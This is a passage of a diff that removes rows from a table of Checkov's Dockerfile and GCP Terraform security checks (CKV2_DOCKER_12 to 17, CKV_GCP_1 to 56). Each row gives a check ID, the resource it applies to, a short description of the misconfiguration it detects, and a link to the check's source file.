-| 2136 | CKV2_DOCKER_12           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable                                                                                           | dockerfile              | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml)                                                                        |
-| 2137 | CKV2_DOCKER_13           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false                                                                                              | dockerfile              | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml)                                                                  |
-| 2138 | CKV2_DOCKER_14           | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value                                                                           | dockerfile              | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml)                                                                                |
-| 2139 | CKV2_DOCKER_14           | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value                                                                           | dockerfile              | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml)                                                                                |
-| 2140 | CKV2_DOCKER_14           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value                                                                           | dockerfile              | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml)                                                                                |
-| 2141 | CKV2_DOCKER_15           | resource                         | RUN                                                                                              | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option                                                           | dockerfile              | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml)                                                          |
-| 2142 | CKV2_DOCKER_16           | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable                                                                                               | dockerfile              | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml)                                                                                |
-| 2143 | CKV2_DOCKER_16           | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable                                                                                               | dockerfile              | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml)                                                                                |
-| 2144 | CKV2_DOCKER_16           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable                                                                                               | dockerfile              | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml)                                                                                |
-| 2145 | CKV2_DOCKER_17           | resource                         | RUN                                                                                              | Ensure that 'chpasswd' is not used to set or remove passwords                                                                                                                                            | dockerfile              | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml)                                                                                            |
-| 2146 | CKV_GCP_1                | resource                         | google_container_cluster                                                                         | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters                                                                                                                               | Terraform               | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py)                                                                                     |
-| 2147 | CKV_GCP_2                | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted ssh access                                                                                                                            | Terraform               | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py)                                   |
-| 2148 | CKV_GCP_3                | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted rdp access                                                                                                                            | Terraform               | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py)                               |
-| 2149 | CKV_GCP_4                | resource                         | google_compute_ssl_policy                                                                        | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites                                                                                                                  | Terraform               | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py)                                                                           |
-| 2150 | CKV_GCP_6                | resource                         | google_sql_database_instance                                                                     | Ensure all Cloud SQL database instance requires all incoming connections to use SSL                                                                                                                      | Terraform               | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py)                                                       |
-| 2151 | CKV_GCP_7                | resource                         | google_container_cluster                                                                         | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters                                                                                                                             | Terraform               | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py)                                                                               |
-| 2152 | CKV_GCP_8                | resource                         | google_container_cluster                                                                         | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters                                                                                                                            | Terraform               | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py)                                                                               |
-| 2153 | CKV_GCP_9                | resource                         | google_container_node_pool                                                                       | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters                                                                                                                                        | Terraform               | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py)                                                               |
-| 2154 | CKV_GCP_10               | resource                         | google_container_node_pool                                                                       | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters                                                                                                                                       | Terraform               | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py)                                                             |
-| 2155 | CKV_GCP_11               | resource                         | google_sql_database_instance                                                                     | Ensure that Cloud SQL database Instances are not open to the world                                                                                                                                       | Terraform               | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py)                                       |
-| 2156 | CKV_GCP_12               | resource                         | google_container_cluster                                                                         | Ensure Network Policy is enabled on Kubernetes Engine Clusters                                                                                                                                           | Terraform               | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py)                                                                         |
-| 2157 | CKV_GCP_13               | resource                         | google_container_cluster                                                                         | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled                                                                                                                       | Terraform               | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py)                                                               |
-| 2158 | CKV_GCP_14               | resource                         | google_sql_database_instance                                                                     | Ensure all Cloud SQL database instance have backup configuration enabled                                                                                                                                 | Terraform               | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py)                                                     |
-| 2159 | CKV_GCP_15               | resource                         | google_bigquery_dataset                                                                          | Ensure that BigQuery datasets are not anonymously or publicly accessible                                                                                                                                 | Terraform               | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py)                                                           |
-| 2160 | CKV_GCP_16               | resource                         | google_dns_managed_zone                                                                          | Ensure that DNSSEC is enabled for Cloud DNS                                                                                                                                                              | Terraform               | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py)                                                                       |
-| 2161 | CKV_GCP_17               | resource                         | google_dns_managed_zone                                                                          | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC                                                                                                            | Terraform               | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py)                                                             |
-| 2162 | CKV_GCP_18               | resource                         | google_container_cluster                                                                         | Ensure GKE Control Plane is not public                                                                                                                                                                   | Terraform               | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py)                                                                             |
-| 2163 | CKV_GCP_19               | resource                         | google_container_cluster                                                                         | Ensure GKE basic auth is disabled                                                                                                                                                                        | Terraform               | [GKEBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py)                                                                                               |
-| 2164 | CKV_GCP_20               | resource                         | google_container_cluster                                                                         | Ensure master authorized networks is set to enabled in GKE clusters                                                                                                                                      | Terraform               | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py)                                                   |
-| 2165 | CKV_GCP_21               | resource                         | google_container_cluster                                                                         | Ensure Kubernetes Clusters are configured with Labels                                                                                                                                                    | Terraform               | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py)                                                                                               |
-| 2166 | CKV_GCP_22               | resource                         | google_container_node_pool                                                                       | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image                                                                                                                    | Terraform               | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py)                                                                                           |
-| 2167 | CKV_GCP_23               | resource                         | google_container_cluster                                                                         | Ensure Kubernetes Cluster is created with Alias IP ranges enabled                                                                                                                                        | Terraform               | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py)                                                                                     |
-| 2168 | CKV_GCP_24               | resource                         | google_container_cluster                                                                         | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters                                                                                                                         | Terraform               | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py)                                                                 |
-| 2169 | CKV_GCP_25               | resource                         | google_container_cluster                                                                         | Ensure Kubernetes Cluster is created with Private cluster enabled                                                                                                                                        | Terraform               | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py)                                                                         |
-| 2170 | CKV_GCP_26               | resource                         | google_compute_subnetwork                                                                        | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network                                                                                                                                   | Terraform               | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py)                                                           |
-| 2171 | CKV_GCP_27               | resource                         | google_project                                                                                   | Ensure that the default network does not exist in a project                                                                                                                                              | Terraform               | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py)                                                                 |
-| 2172 | CKV_GCP_28               | resource                         | google_storage_bucket_iam_binding                                                                | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform               | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                               |
-| 2173 | CKV_GCP_28               | resource                         | google_storage_bucket_iam_member                                                                 | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform               | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                               |
-| 2174 | CKV_GCP_29               | resource                         | google_storage_bucket                                                                            | Ensure that Cloud Storage buckets have uniform bucket-level access enabled                                                                                                                               | Terraform               | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py)                                                       |
-| 2175 | CKV_GCP_30               | resource                         | google_compute_instance                                                                          | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform               | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                   |
-| 2176 | CKV_GCP_30               | resource                         | google_compute_instance_from_template                                                            | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform               | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                   |
-| 2177 | CKV_GCP_30               | resource                         | google_compute_instance_template                                                                 | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform               | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                   |
-| 2178 | CKV_GCP_31               | resource                         | google_compute_instance                                                                          | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform               | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                               |
-| 2179 | CKV_GCP_31               | resource                         | google_compute_instance_from_template                                                            | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform               | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                               |
-| 2180 | CKV_GCP_31               | resource                         | google_compute_instance_template                                                                 | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform               | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                               |
-| 2181 | CKV_GCP_32               | resource                         | google_compute_instance                                                                          | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform               | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                               |
-| 2182 | CKV_GCP_32               | resource                         | google_compute_instance_from_template                                                            | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform               | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                               |
-| 2183 | CKV_GCP_32               | resource                         | google_compute_instance_template                                                                 | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform               | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                               |
-| 2184 | CKV_GCP_33               | resource                         | google_compute_project_metadata                                                                  | Ensure oslogin is enabled for a Project                                                                                                                                                                  | Terraform               | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py)                                                                 |
-| 2185 | CKV_GCP_34               | resource                         | google_compute_instance                                                                          | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform               | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                               |
-| 2186 | CKV_GCP_34               | resource                         | google_compute_instance_from_template                                                            | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform               | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                               |
-| 2187 | CKV_GCP_34               | resource                         | google_compute_instance_template                                                                 | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform               | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                               |
-| 2188 | CKV_GCP_35               | resource                         | google_compute_instance                                                                          | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform               | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                       |
-| 2189 | CKV_GCP_35               | resource                         | google_compute_instance_from_template                                                            | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform               | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                       |
-| 2190 | CKV_GCP_35               | resource                         | google_compute_instance_template                                                                 | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform               | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                       |
-| 2191 | CKV_GCP_36               | resource                         | google_compute_instance                                                                          | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform               | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                           |
-| 2192 | CKV_GCP_36               | resource                         | google_compute_instance_from_template                                                            | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform               | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                           |
-| 2193 | CKV_GCP_36               | resource                         | google_compute_instance_template                                                                 | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform               | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                           |
-| 2194 | CKV_GCP_37               | resource                         | google_compute_disk                                                                              | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform               | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py)                                                                 |
-| 2195 | CKV_GCP_38               | resource                         | google_compute_instance                                                                          | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform               | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py)                                                         |
-| 2196 | CKV_GCP_39               | resource                         | google_compute_instance                                                                          | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform               | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                         |
-| 2197 | CKV_GCP_39               | resource                         | google_compute_instance_from_template                                                            | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform               | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                         |
-| 2198 | CKV_GCP_39               | resource                         | google_compute_instance_template                                                                 | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform               | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                         |
-| 2199 | CKV_GCP_40               | resource                         | google_compute_instance                                                                          | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform               | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                         |
-| 2200 | CKV_GCP_40               | resource                         | google_compute_instance_from_template                                                            | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform               | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                         |
-| 2201 | CKV_GCP_40               | resource                         | google_compute_instance_template                                                                 | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform               | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                         |
-| 2202 | CKV_GCP_41               | resource                         | google_project_iam_binding                                                                       | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform               | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                               |
-| 2203 | CKV_GCP_41               | resource                         | google_project_iam_member                                                                        | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform               | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                               |
-| 2204 | CKV_GCP_42               | resource                         | google_project_iam_member                                                                        | Ensure that Service Account has no Admin privileges                                                                                                                                                      | Terraform               | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py)                                                       |
-| 2205 | CKV_GCP_43               | resource                         | google_kms_crypto_key                                                                            | Ensure KMS encryption keys are rotated within a period of 90 days                                                                                                                                        | Terraform               | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py)                                                                         |
-| 2206 | CKV_GCP_44               | resource                         | google_folder_iam_binding                                                                        | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform               | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                             |
-| 2207 | CKV_GCP_44               | resource                         | google_folder_iam_member                                                                         | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform               | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                             |
-| 2208 | CKV_GCP_45               | resource                         | google_organization_iam_binding                                                                  | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform               | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                   |
-| 2209 | CKV_GCP_45               | resource                         | google_organization_iam_member                                                                   | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform               | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                   |
-| 2210 | CKV_GCP_46               | resource                         | google_project_iam_binding                                                                       | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform               | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                       |
-| 2211 | CKV_GCP_46               | resource                         | google_project_iam_member                                                                        | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform               | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                       |
-| 2212 | CKV_GCP_47               | resource                         | google_organization_iam_binding                                                                  | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform               | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                               |
-| 2213 | CKV_GCP_47               | resource                         | google_organization_iam_member                                                                   | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform               | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                               |
-| 2214 | CKV_GCP_48               | resource                         | google_folder_iam_binding                                                                        | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform               | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                         |
-| 2215 | CKV_GCP_48               | resource                         | google_folder_iam_member                                                                         | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform               | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                         |
-| 2216 | CKV_GCP_49               | resource                         | google_project_iam_binding                                                                       | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform               | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                           |
-| 2217 | CKV_GCP_49               | resource                         | google_project_iam_member                                                                        | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform               | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                           |
-| 2218 | CKV_GCP_50               | resource                         | google_sql_database_instance                                                                     | Ensure MySQL database 'local_infile' flag is set to 'off'                                                                                                                                                | Terraform               | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py)                                                           |
-| 2219 | CKV_GCP_51               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on'                                                                                                                                         | Terraform               | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py)                                                 |
-| 2220 | CKV_GCP_52               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_connections' flag is set to 'on'                                                                                                                                         | Terraform               | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py)                                                   |
-| 2221 | CKV_GCP_53               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on'                                                                                                                                      | Terraform               | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py)                                             |
-| 2222 | CKV_GCP_54               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on'                                                                                                                                          | Terraform               | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py)                                                     |
-| 2223 | CKV_GCP_55               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value                                                                                                                               | Terraform               | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py)                                                   |
-| 2224 | CKV_GCP_56               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_temp_files flag is set to '0'                                                                                                                                            | Terraform               | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py)                                                               |
